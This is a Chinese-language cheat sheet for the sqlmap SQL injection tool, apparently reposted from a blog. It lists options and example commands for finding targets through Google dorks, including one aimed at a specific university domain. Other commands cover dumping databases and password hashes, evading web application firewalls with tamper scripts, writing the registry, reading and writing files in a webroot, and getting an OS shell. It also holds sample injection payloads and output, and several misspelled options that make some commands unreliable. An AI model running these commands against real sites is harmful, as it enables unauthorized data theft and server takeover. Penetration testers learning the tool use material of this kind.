sqlmap

标签：back   删除   war   导致   接受   字符编码   possible   额外   pre   

基本参数：
--url “” 通过url获取目标
-r c:\1.txt bp读取http请求包
sqlmap.py -r C:\2.txt
-m c:\1.txt 读取链接列表
inurl:jnxy.edu.cn inurl asp?id=
导入为c:\1.txt
sqlmap.py -m c:\1.txt

-g 处理google搜索结果中的前一百个结果
sqlmap.py -g "inurl:\"php?id=1\""
-p 参数设置成想要测试的参数
sqlmap.py -u "http://1.1.1.1/asp?id=1&sid=123&fg=df" -p "sid=123"
-s 对每一个目标都会在output路径下自动生成一个SQLite文件，如果用户向指定读取的文件路径，可用之
-t 这个参数需要跟一个文本文件，sqlmap会把http请求与响应的日志保存其中
sqlmap.py -u "" -t c:\1.txt
--batch 取消交互,全部默认
--charset=UTF-8 设定字符编码
--hex 有时候字符编码的问题，可能导致数据丢失，可以使用hex函数来避免
sqlmap -u "" --baner --hex
--smart 有时对多目标url进行测试，为节省时间，只对能够快速判断为注入的报错点进行注入
--mobile 有时服务端只接受移动端的访问，可设定一个手机的user-agent来模仿手机登录
--is-dba 当前用户权限
--dbs 当前数据库
--current-db 网站当前数据库
--users 所有数据库用户
--current-user 当前数据库用户
--tables 参数，列表名
--columns 参数，列字段
--dump 参数，下载数据
--dump-all 转存DBNS数据库所有表项目

-v 显示调试信息
0--只显示python错误以及严重错误的信息
1--同时显示基本信息和警告信息(默认)
2--同时显示debug信息
3--同时显示注入的payload
4--同时显示http请求
5--同时显示http响应头
6--同时显示http响应页面
--dbms=mysql oracle mssql 指定数据库
--passwords 枚举所有用户密码
--roles 列举数据库管理员角色
--privileges 列出数据库管理员权限
--schema --batch --exclude-sysdbs
列举数据库系统的架构
--level 测试等级，默认为1，决定加载的payload
2--cookie
3--http头
--risk 风险等级--测试的语句在xml/payloads.html 可以自行添加
1--测试大部分的测试语句
2--增加基于事件的测试语句
3--增加or语句的sql注入测试
--data 指定post提交方式的注入表单
sqlmap.py -u "" --data="username=admin"
--param-del 指定分隔符
sqlmap.py -u "" data="query=foobar;id=1" --param-del=";"
--cookie 用于cookie注入
sqlmap.py -u "" --cookie "id=9" --table --level 2
--referer 伪造http头中的referer，当level设置为3及以上时会尝试referer注入
sqlmap.py -u "" --referer "127.0.0.1/"
Parameter: kind (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: kind=2 AND 5138=5138
--headers 通过headers参数来增加额外的http头
sqlmap.py -u "" --hearers "client-ip:1.1.1.1‘"
sqlmap.py -u "" --hearers "x-forward-for:1.1.1.1‘"
--proxy 使用代理接收数据包
sqlmap.py -u "" --current --proxy "127.0.0.1:8080"
通过bp查看数据包

时间控制：
--delay 设定两个http请求间的迟延
--timeout 设定一个http请求超过多久判定为超时
--retries 当超时时。设定重连次数，默认为3
sqlmap.py -u "" --delay=0.5 --current-db 0.5秒访问一次
sqlmap.py -u "" --timeout=10
绕过安全策略：当sqlmap进行探测或注入时，可能会出发waf上屏蔽所有请求的策略，绕过方法以下
--safe-url 提供一个安全不错误的连接，每隔一段时间都会去访问一下
--safe-ferq 提供一个安全不错误的连接，每次测试请求之后都会再访问一遍安全连接
--identity-waf 识别waf
--check-waf 探测waf

注册表操作:
--reg-read 读取注册表
--reg-add 写入注册表
--reg-del 删除注册表
sqlmap.py -u "" --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
--prefix "" 在payload的前面加一些符号（闭合）
--suiffix "" 在payload的后面加一些符号（闭合）
|--id=(‘1‘)--id=(‘‘)1 and (‘1‘=‘1‘)
例*如*：$query="select * from users where id=(‘".$_get[‘id‘]."‘)limit 0,1";
目的：id=(‘1 and 1=1‘)
方案：id=(‘1‘) and 1=1(‘)
sqlmap.py -u "http://1.1.1.1/asp?id=1" -p id --prefix "‘) --suffix "and (‘1‘=‘1"
相当于：
$query ="select * from users where id=(‘1‘)<payload>and (‘1‘=‘1‘) limit 0,1";
--prefix "‘)" --suffix "and 1=1(‘"
--technique 指定sqlmap使用的探测技术
B:Boollean_based bling SQL injection 布尔型注入
E：Error-based SQL injection 报错注入
U:UNION query SQL injection 联合查询注入
S:Stacked queries SQL injection 多语句查询注入
T:Time-based blind SQL injection 延迟注入
sqlmap.py -u "" --technique=BEU
--union-cols 指定测试列数
sqlmap.py -u "" --union-cols=100
--union-char 指定联合查询的填充字符
union-char=1
union-char=null 默认
--second-order 二阶注入

sqlmap.py -u "http://1.1.1.1/index.php" --second-order "http://1.1.1.1/1.php"

--dump-all 获取所有数据库表的内容
--exclude-sysdbs只获取用户数据库的表
--search -C 跟着用，分隔的列名，将会在数据库搜索指定项
-T
-D
--udf-inject,--share-lib 用户自定义函数，注入到响应版本mysql的插件目录中，然后执行命令(创建用户...)

--common-tables -D A 暴力破解表名
-columns -T B -D A
post登录框注入：

sqlmap.py -u "/login.php" --data “name=1&pass=1” 指定加载表单
sqlmap.py -u "/login.php" --forms 自动加载表单
搜索框注入：
sqlmap.py -r search-test.txt
伪静态注入：
sqlmap.py -u "http://1.1.1.1/index.php/view/id/40*.html"
延迟注入：相当于and sleep(5)
--time-sec=5
base64编码注入:
sqlmap.py -u "" base64encode.py -dbs
waf绕过注入：
sqlmap.py -u "" -v3 --dbs --batch --tamper "space2morehash.py"
sqlmap.py -u "" --os-pwn --msf-th/usr/share/metasploit-framework/
sql语句执行：
--sql-query="select @@version();"
--sql-shell
select load_file(c:\1.txt)
文件读写：当数据库为mysql，postgresql，mssql,需要管理员权限(access不支持)，可以操作以下
--file-read
sqlmap.py -u "" --file-read="C:\Inetpub\wwwroot\mysql-sql\index.php"
--file-write,--file-dest
sqlmap.py -u "" --file-write="c:1.txt" --file-dest="C:\Inetpub\wwwroot\mysql-sql\index.php"
将本地1.txt导入到服务端
命令执行：mysql，mssql，postgresql，管理员权限
sqlmap.py -u "" --os-shell
写入网站绝对路径
ipconfig

缓存路径：C:\Users\Administrator\.sqlmap\output\192.168.120.141
清除缓存：--flush-session
sqlmap.py -u ""
[INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

sqlmap.py -u "" --is-dba 判断当前用户是否具有管理员权限
current user is DBA: None

sqlmap.py - "" --current-user
current user: None
Microsoft Access it is not possible to enumerate the users
sqlmap.py -u "" --dbs 通过枚举数据库判断用户权限大小
[WARNING] on Microsoft Access it is not possible to enumerate databases (use only ‘--tables‘)
sqlmap.py -u "" --current-db 获取当前数据库名称

sqlmap

标签：back   删除   war   导致   接受   字符编码   possible   额外   pre   

原文地址：https://www.cnblogs.com/kurds/p/9534225.html